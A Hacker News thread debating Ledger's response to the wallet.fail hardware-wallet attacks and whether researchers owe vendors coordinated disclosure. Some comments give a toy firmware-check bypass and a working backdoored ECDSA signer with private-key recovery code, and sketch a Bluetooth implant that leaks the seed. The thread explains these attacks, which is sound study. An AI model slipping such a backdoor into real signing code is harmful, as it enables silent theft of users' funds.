
Still Got Your Crypto: In Response to Wallet.fail’s Presentation - asymmetric
https://www.ledger.fr/2018/12/28/chaos-communication-congress-in-response-to-wallet-fails-presentation/
======
pmorici
This seems a little disingenuous to me. The implication of the first attack is
not that someone might sneak into your house and modify your Ledger hardware.
It's that hardware could come to you with modified firmware from the get-go.

~~~
32032141
This is largely the issue with 'hardware wallets': the security models
aren't particularly well defined, which leads to ambiguity like this.
You're absolutely correct that the concern is that the device is not
genuine, which is what attestation of the firmware is supposed to prevent.
In the case of the Ledger, unfortunately, the attestation doesn't prove
anything about the safety of the device, for a number of reasons (this
attack, and other logical ones).

The obvious one is that the security domains in the device are idiotic.
There's a "secure" processor with almost no processing power or IO, and an
"insecure" one which handles the screen, buttons, and IO. Both of them handle
secrets (for example, the seed shown on the screen), which leaves you with
essentially no gain whatsoever.

A more logical hardware implant than the one shown at CCC is a Bluetooth
module that simply reads the I2C lines going to the screen and transmits
the seed as a beacon whenever the device is plugged in. This has the
advantage of not requiring the attacker's presence, as their demonstration
did, and with assistance needs no physical presence at all.

I described this as a concept for a security review of a cold storage setup
which was "unbreakable". Is this sort of thing realistic? Perhaps. Is a $5
wrench attack more sensible? Probably. It's worth considering what supply
chain attacks are possible though.

~~~
lima
> The obvious one is that the security domains in the device are idiotic.
> There's a "secure" processor with almost no processing power or IO, and an
> "insecure" one which handles the screen, buttons, and IO. Both of them handle
> secrets (for example, the seed shown on the screen), which leaves you with
> essentially no gain whatsoever.

I think the idea is that the secure processor will verify the insecure
processor's firmware (the "MCU check"), making such attacks impractical.

Of course, the design is broken and it can be bypassed by emulation, but
security isn't all or nothing - "no gain whatsoever" is not true.
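
As a toy model of why this style of check is bypassable: if the protocol is
essentially "prove you are running the genuine image", a compromised MCU that
still has access to a copy of the genuine image can answer every challenge
correctly. The real MCU check tries to make that hard by relying on the MCU's
limited flash, and the wallet.fail bypass worked around it; the sketch below
is hypothetical, not Ledger's actual protocol, and only shows the basic
problem.

```python
# Toy challenge-response firmware check, and why a naive one proves little.
import hashlib
import os

GENUINE_FW = b"\x90" * 1024  # stand-in for the genuine MCU firmware image

def secure_element_check(mcu_respond):
    # SE sends a random challenge; MCU must return H(challenge || firmware).
    challenge = os.urandom(16)
    expected = hashlib.sha256(challenge + GENUINE_FW).digest()
    return mcu_respond(challenge) == expected

def honest_mcu(challenge):
    # Genuine MCU hashes the firmware it is actually running.
    return hashlib.sha256(challenge + GENUINE_FW).digest()

def malicious_mcu(challenge):
    # Compromised MCU keeps a copy of the genuine image around and
    # "emulates" the honest answer; the check cannot tell the difference.
    stashed_copy = GENUINE_FW
    return hashlib.sha256(challenge + stashed_copy).digest()

assert secure_element_check(honest_mcu)
assert secure_element_check(malicious_mcu)  # check passes -- bypassed
```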

~~~
32032141
Even if the firmware on both processors is completely virgin, that doesn't
say much about the safety of the device. I agree that security is not all
or nothing; protection in layers is always the goal of secure products. I
do caution, however, that presenting things as bulletproof can cause
complacency: you need to be up front about what tools such as attestation
afford you. In this case it cannot tell you whether the device is safe or
untampered with.

------
paulpauper
I have occasionally heard stories of people losing funds from hardware
wallets. Usually it's after buying one on Amazon.

~~~
coralreef
It's usually because the buyer was duped into following fake instructions.
The scammer ships an official-looking physical 'card' of recovery words
with the wallet, tricking the user into putting money into accounts that
the scammer also has access to.

------
Ayesh
I didn't watch the 35c3 presentation, but it certainly looks like an
absurd attack. Kudos to the Ledger people for replying to it
constructively.

Some talks at 35c3, DEF CON, etc. remind me of rubber-hose cryptanalysis
([https://xkcd.com/538/](https://xkcd.com/538/)).

On the other hand, the www.ledger.fr web site does not properly redirect
to HTTPS (e.g. [http://www.ledger.fr/bounty-program/](http://www.ledger.fr/bounty-program/)),
and that would've been a more practical attack.

~~~
32032141
Ledger has long been grossly inept at security; there's really nothing
absurd about this attack at all. In the Bitcoin industry we frequently see
very detailed setups for long-timeframe attacks, with substantial effort
going into identity theft and physical compromise. Worse, for these
devices in particular, a backdoored device is almost undetectable due to
the way ECDSA can be used to transmit encrypted data in its signatures.
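
For the curious, the ECDSA point is the classic kleptographic trick: the
signer derives its nonce from a key only the attacker knows, so every
signature verifies normally yet lets the attacker recover the private key.
A minimal sketch over secp256k1 (hypothetical code, not taken from any real
firmware):

```python
# Sketch: a backdoored ECDSA signer whose "random" nonce is secretly
# attacker-recoverable. Pure-Python secp256k1, for illustration only.
import hashlib
import hmac

P = 2**256 - 2**32 - 977  # field prime
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

def ec_add(p, q):
    if p is None: return q
    if q is None: return p
    if p[0] == q[0] and (p[1] + q[1]) % P == 0:
        return None  # point at infinity
    if p == q:
        lam = 3 * p[0] * p[0] * pow(2 * p[1], -1, P) % P
    else:
        lam = (q[1] - p[1]) * pow(q[0] - p[0], -1, P) % P
    x = (lam * lam - p[0] - q[0]) % P
    return (x, (lam * (p[0] - x) - p[1]) % P)

def ec_mul(k, pt=G):
    r = None
    while k:
        if k & 1:
            r = ec_add(r, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return r

def backdoored_sign(d, msg, exfil_key):
    # The nonce looks random to everyone except the attacker, who can
    # recompute it from exfil_key and the (public) signed message.
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    k = int.from_bytes(hmac.new(exfil_key, msg, hashlib.sha256).digest(), "big") % N
    r = ec_mul(k)[0] % N
    s = pow(k, -1, N) * (z + r * d) % N
    return r, s  # an ordinary, valid-looking ECDSA signature

def attacker_recover(sig, msg, exfil_key):
    # Knowing k, solve s = k^-1 (z + r*d)  =>  d = (s*k - z) / r  (mod N)
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    k = int.from_bytes(hmac.new(exfil_key, msg, hashlib.sha256).digest(), "big") % N
    r, s = sig
    return (s * k - z) * pow(r, -1, N) % N

d = 0xC0FFEE  # victim's private key, known only to the device
sig = backdoored_sign(d, b"send 1 BTC", b"attacker secret")
assert attacker_recover(sig, b"send 1 BTC", b"attacker secret") == d
```

One published signature is enough, and since the nonce is derived
deterministically (the same shape as an RFC 6979 signer), no amount of
black-box testing distinguishes it from an honest implementation.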

Ledger was recently either compromised or shown to have no release process
(both equally bad), having released a version of their application that
stole user funds. Their claim is that they released a development build
from a dirty git clone that contained "testing" code which happened to
hardcode an address that every transaction was sent to.

[https://www.ledger.fr/2018/08/03/important-message-
concernin...](https://www.ledger.fr/2018/08/03/important-message-concerning-
the-ledger-wallet-ethereum-chrome-app/)

~~~
tgsovlerkhgsel
That's indeed impressively bad. The full address seems to be
[https://etherscan.io/address/0xC33B16198DD9FB3bB342d8119694f...](https://etherscan.io/address/0xC33B16198DD9FB3bB342d8119694f94aDfcdca23)

There don't seem to be any outbound transactions from that address, so Ledger
refunded the victims separately instead of sending the funds back. That means
they likely don't control the key. OTOH, the funds (worth about $40k for the
Ether + another $20k for the tokens) haven't moved at all, so "test key that
was lost long ago" does seem plausible. (Especially since it also was used on
the testnet before
[https://ropsten.etherscan.io/address/0xC33B16198DD9FB3bB342d...](https://ropsten.etherscan.io/address/0xC33B16198DD9FB3bB342d8119694f94aDfcdca23))

Could of course also be an attacker who was hoping for a bigger loot and
didn't want to risk getting caught over $60k, but as you said, not sure what's
worse - incompetence or compromise.

~~~
32032141
Yep.

Either they are so incompetent that they released software straight out of
someone's working git tree, with absolutely no process to catch a
ridiculous and obvious failure, or they got popped and are lying about it.
Neither is anything but a disaster.

------
anonymouzz
What bothers me is that they did not responsibly disclose the
vulnerabilities to the manufacturers ahead of time. This is not moral, and
I'm not sure what one gains by skipping it. I think conference organizers
should pressure presenters to disclose before their talks.

Either that, or attendees should apply bottom-up pressure and ask live
questions like "what did you do to responsibly disclose this issue?". I
think I'll do that at future security conferences I attend.

~~~
Canada
I wish everyone would stop using the term "responsible" to describe
"coordinated" disclosure. Researchers do not owe vendors any cooperation at
all. It is perfectly moral to present factual information without any notice
whatsoever. I think there's often something to gain through coordinated
disclosure, but not always, and it's not your choice to make unless we're
talking about your own findings.

~~~
32032141
Agreed. Researchers owe the companies absolutely nothing.

~~~
anonymouzz
It's not about the companies. I do not care much about them.

It's about the people who may be hacked between someone's 0-day
disclosure and the manufacturer's response. And if the manufacturer
doesn't care to fix the bug, roast them for that. It's their fault.

It's not moral because people (not companies) may suffer. Your actions have
consequences.

~~~
jstanley
The vulnerability doesn't pop into existence the second it is publicly
announced. It was already there. Everybody was already vulnerable.

At least if it's publicly announced people can take steps to defend against
it.

~~~
anonymouzz
Yes, but why not send a single email to the manufacturer before making it
public? Does it really hurt that much?

From a "cyberpunk hacker" mentality this only gives you an opportunity to
roast the manufacturer if they do nothing. Perhaps even bankrupt them; I
don't care. Competition will take their place and hopefully be better.

~~~
tgsovlerkhgsel
> Does it really hurt so much?

Potentially yes. The manufacturer may attempt to prevent publication through
legal threats or action, which can be annoying and expensive even if you
ultimately win. The incentive to be annoying goes down significantly once the
disclosure cannot be prevented (because it's already public) and the public is
watching (i.e. any action against the researcher has a higher likelihood of
public backlash).

It also allows the manufacturer, who is likely more experienced and has more
resources, to start PR to downplay the attack.

I generally default to responsible/coordinated disclosure, but I also do my
research first. If the company has previously shown undesirable behavior (like
the stuff I've described), or I've reported to them previously and didn't like
the experience, they'll learn about the disclosure from the news.

